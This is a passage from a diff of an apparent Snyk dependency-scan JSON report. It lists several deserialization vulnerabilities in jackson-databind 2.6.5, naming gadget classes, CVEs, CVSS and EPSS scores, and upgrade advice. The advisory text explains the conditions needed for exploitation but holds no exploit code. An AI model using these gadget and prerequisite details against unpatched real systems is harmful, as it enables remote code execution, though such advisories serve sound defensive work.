"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:03.656527Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11112" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-58pp-9c76-5625" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:29:29.728517Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.113524Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2682", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.162608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92404", + "probability": "0.04399", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11620" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h4rc-386g-6m85" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:55:38.169333Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:23Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:17.073265Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2680", + "title": "GitHub Issues" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.933985Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92902", + "probability": "0.05021", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11619" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-27xj-rqx5-2255" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:59:04.995807Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.585105Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "XuYuanzhen" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2704", + "title": "Github Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.439153Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", + "epssDetails": { + "percentile": "0.93100", + "probability": "0.05308", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14062" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c265-37vj-cwcc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-05-29T15:36:30.302636Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-01T15:36:06Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-05-29T15:36:05Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.587184Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Al1ex@knownsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2765", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 
8.1, + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.171514Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain 